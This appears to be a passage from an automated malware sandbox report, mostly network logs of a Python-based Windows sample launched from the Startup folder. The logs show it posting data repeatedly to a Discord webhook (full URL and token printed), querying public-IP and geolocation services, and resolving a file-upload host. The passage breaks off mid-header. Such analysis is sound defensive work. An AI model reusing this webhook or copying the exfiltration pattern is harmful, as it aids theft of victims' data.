            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB7F3E40 PyExc_ValueError,PyErr_SetString,PyEval_SaveThread,WSARecvFrom,PyEval_RestoreThread,WSAGetLastError,SetEvent,_Py_NoneStruct,10_2_00007FFBBB7F3E40
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficHTTP traffic detected: GET /jsonp/8.46.123.33 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficHTTP traffic detected: GET /jsonp/8.46.123.33 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficHTTP traffic detected: GET /jsonp/8.46.123.33 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficHTTP traffic detected: GET /jsonp/8.46.123.33 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficHTTP traffic detected: GET /jsonp/8.46.123.33 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficHTTP traffic detected: GET /jsonp/8.46.123.33 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficHTTP traffic detected: GET /jsonp/8.46.123.33 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficHTTP traffic detected: GET /jsonp/8.46.123.33 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: api.gofile.io
            Source: global trafficDNS traffic detected: DNS query: geolocation-db.com
            Source: global trafficDNS traffic detected: DNS query: discord.com
            Source: unknownHTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:46 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2c2548ac7cec11ef96902e88ff694586; Expires=Wed, 26-Sep-2029 16:18:46 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453928x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xovJQK%2BUb%2BSRoiWGWkZ%2FgK%2FXYFN8quOhjeQVzrVNZhFTlqUu%2BRoTMkJ8aKXQCTOZR2Fiyxi3zI%2FAWqzoIfMqas%2BNd%2F9z5lWD4Fw3f%2B2rX3NvfiQZgq%2F%2Fw4YCseFD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2c2548ac7cec11ef96902e88ff6945860574171a8514fb3dbed8872d2b00dc2dccec3c3323101a3641fb73b584d3e0dd; Expires=Wed, 26-Sep-2029 16:18:46 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=d88352afcbe6c0495ada4acc41fdf5b344043843-1727453926; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:47 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2c884cae7cec11efb7d996c5ef0f4df4; Expires=Wed, 26-Sep-2029 16:18:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453928x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wSKOyIVVhqjejoFtO0Y62dBcZKdHqGnV96QBVRkYjfz%2BB3FJ2X5fqSJLqRJeM3Nfz61owU5d0917%2FmmRa2OGz1UVQolOJivICCKm4nVjLZljCq17CcJ1XRHlPsYr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2c884cae7cec11efb7d996c5ef0f4df4af77d857d1ca82c06705918a393e1383f4d5bb766d3204b3dbd951095cc23a8e; Expires=Wed, 26-Sep-2029 16:18:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=30984a00c213f058f0b9c6261788305c89a5cec9-1727453927; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:47 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2ceda5867cec11efb49f26388b8e290c; Expires=Wed, 26-Sep-2029 16:18:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453929x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9VLiIZL9CiQDwsZsVVM8xkihe3RdWMatsLZYBBAjlz8rE9BHI2e5hEMvigE6G%2FL8Jc4DZ8agV%2F3NwXezHs%2BzHNaIa5duVfIB5aZqf4xvbW1NQ5TWu7ICnloS2teB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2ceda5867cec11efb49f26388b8e290c1c04bc1da02c529961f307b8cc5d202341e437e6ba8755640047164057bc7b5c; Expires=Wed, 26-Sep-2029 16:18:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=30984a00c213f058f0b9c6261788305c89a5cec9-1727453927; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:48 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2d51653a7cec11efbc503afbab16203a; Expires=Wed, 26-Sep-2029 16:18:48 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453930x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sY%2Bjsb%2FW%2FfUaqsU7MA8A8TOSiqI00aN8mmv3uUl7Z4NFiAC1%2BNK1wnK%2F%2FPd%2FdhXw7SSi%2Fk1DrihQ%2FHh2pz6sd8bvu%2BrxZ7VE71oXmt4QCpyq10SZ%2FRvjqyPc%2FwGj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2d51653a7cec11efbc503afbab16203aa9b8cbaa67aebaf0008bcea960b22ff7f92bd80335a265625fda557de3aa0079; Expires=Wed, 26-Sep-2029 16:18:48 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=74796d8ae5164ae6da566c41aec5bf5b1d4c8013-1727453928; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:49 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2db5f4c87cec11ef9f2fea3c9a69472c; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453930x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cvXOxl5GduNF6QQBTn4VjDMmJuCct0yF7KCzgh1xZaHmMAlA9tURtileaYSYRVwsX0qVP875FsETEy%2Bc%2BbeBN6PJp4rorgwLZWLTT8EF7PNHYQs6DD7MeSu2NZZR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2db5f4c87cec11ef9f2fea3c9a69472c647c95a3107240db7e30f3e52fd1ce39c773bfe25bc2e7394de89af0e12b41ca; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=27daf6c2fc89799e3442095c271b0cbbbb308515-1727453929; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:49 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2dbb081e7cec11efa56b768b656d6a57; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1727453931x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tesq4q%2Fof5N%2FfOFagtamVLpkr6i9eeYF3bBeKAbDld1TyVPqX%2FHpV3t4la270yHU9z4nH4mjDEsQYdhSuHpvNeiOwxwIZDqBxVyhGAw0rfVPAivJJDrvTLEDPNPz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2dbb081e7cec11efa56b768b656d6a57312e2dc54f683e071f75ea25684146e12ad81c1e4d85666697e737dad60ad7b1; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: 